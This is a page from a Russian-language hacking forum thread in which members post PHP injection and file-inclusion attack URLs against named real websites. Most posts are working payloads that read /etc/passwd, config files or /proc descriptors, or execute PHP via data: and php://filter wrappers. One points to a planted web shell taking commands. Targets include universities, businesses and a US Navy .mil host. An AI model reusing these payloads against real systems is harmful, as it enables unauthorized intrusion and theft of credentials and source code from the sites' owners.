PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

Page 63 of 72
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://www.ub.edu/histeco/eng/membre.php?page=../../../../../etc/passwd
     
    #1241 Tigger, 12 May 2011
    1 person likes this.
  2. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    http://jedit.org/index.php?page=/etc/passwd%00
     
    #1242 SHiNiGaMi, 14 May 2011
    1 person likes this.
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    http://www.skincarenet.org/news.php?include=../../../../../etc/passwd%00
     
    #1243 wkar, 27 May 2011
    1 person likes this.
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://www.pcbodega.com/pcb2/aboutus.php?lik=data:,%3C?php%20phpinfo();?%3E
     
    _________________________
    #1244 Expl0ited, 29 May 2011
    2 people like this.
  5. Coole_r

    Coole_r Member

    Joined:
    29 Sep 2009
    Messages:
    33
    Likes Received:
    14
    Reputations:
    6
    Code:
    http://www.zfmsh.nsu.ru/zfmsh/index.php?name=../../../../../../etc/passwd
     
    #1245 Coole_r, 31 May 2011
    2 people like this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://afob.com/router.php?poll=php://filter/convert.base64-encode/resource=poll_politics_saudi_arabia/
     
    #1246 попугай, 18 Jun 2011
    1 person likes this.
  7. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    http://sartraccc.ru/i.php?oper=read_file&filename=/etc/passwd
     
    #1247 stasiliy, 21 Jun 2011
  8. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://caring.jafnretti.is/forum/users/shell666.php?cmd=phpinfo();

    pr4
     
    #1248 vaddd, 21 Jun 2011
  9. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://flight228.net/blog/index.php?post=../config.php%00
     
    #1249 Фараон, 21 Jun 2011
  10. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://www.hiltl.ch/restaurant.php?id=../../../../../../../../../etc/passwd%00
     
    #1250 nemaniak, 5 Jul 2011
  11. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    RFI, правда права read-only

    http://www.geishaclub.ru/massag.php?text=RFI

    НЕЛЬЗЯ ПОСТИТЬ ШЕЛЛЫ, ПАРОЛИ К АДМИНКАМ/ФТП И ПРОЧЕЕ
     
    _________________________
    #1251 <Cyber-punk>, 18 Jul 2011
    Last edited by a moderator: 18 Jul 2011
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    http://clubesa.info/print5.php?page=../../../../../../../../../../etc/passwd
    http://portix.info/print.php?page=../../../../../../../../../../etc/passwd

    Читалка файлов с расширением .php (Ищи что нибудь типа config.php)
    http://old.xalqbank.az/main.php?lg=/../../index
     
    _________________________
    #1252 <Cyber-punk>, 22 Jul 2011
    Last edited by a moderator: 22 Jul 2011
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    deleted
     
    #1253 попугай, 25 Jul 2011
    Last edited: 2 Jul 2012
    4 people like this.
  14. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.jlc-software.com/index.php?page=index.php

    http://hamantfoundation.org/centromedico/index.php?page=/home/dhamant/hamantfoundation.org/centromedico/index.php

    http://www.nfm.co.za/index.php?page=../../../../../../../../../proc/self/fd/6

    http://www.renoldiimmobiliare.it/index.php?page=../../../../../../../../proc/self/fd/8
     
    #1254 547, 26 Jul 2011
    Last edited: 26 Jul 2011
    1 person likes this.
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Возможно исполнение произвольного PHP кода, размещенного в любом файле (картинка/текстовый документ и пр.) на сервере.
    • http://thepiratebay.org/robots.txt/.php
    Описание уязвимости: http://habrahabr.ru/blogs/sysadm/100961/
     
    _________________________
    #1255 Expl0ited, 30 Jul 2011
    2 people like this.
  16. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    http://motor.power-man.ru/article.php?value=/etc/passwd
     
    #1256 moodoone, 8 Aug 2011
    1 person likes this.
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Парламент Уганды.
    хоть и не php-inj

    http://www.cfi.co.ug/index.php?p=../index
     
    #1257 попугай, 13 Aug 2011
  18. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    http://izhpost.ru/index.php?PAGE=../../../etc/passwd

    http://jrudevels.org/index.php?pg=../../../etc/passwd
     
    #1258 Sloneny, 15 Aug 2011
    Last edited: 15 Aug 2011
  19. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    удаленное выполнение php кода

    на сервачке есть сайт с тИц 275, но доступ к нему - только чтение. также там хостился сайт fms.kursk.ru, сейчас переехал.
     
    #1259 vaddd, 16 Aug 2011
    2 people like this.
  20. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    php-injection (.mil)

    .mil
    Code:
    http://sungrazer.nrl.navy[COLOR=Red].mil[/COLOR]/index.php?p=[COLOR=Red]index.php[/COLOR]
     
    #1260 mix0x0, 23 Aug 2011
    3 people like this.
(You must log in or sign up to post here.)
Page 63 of 72
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.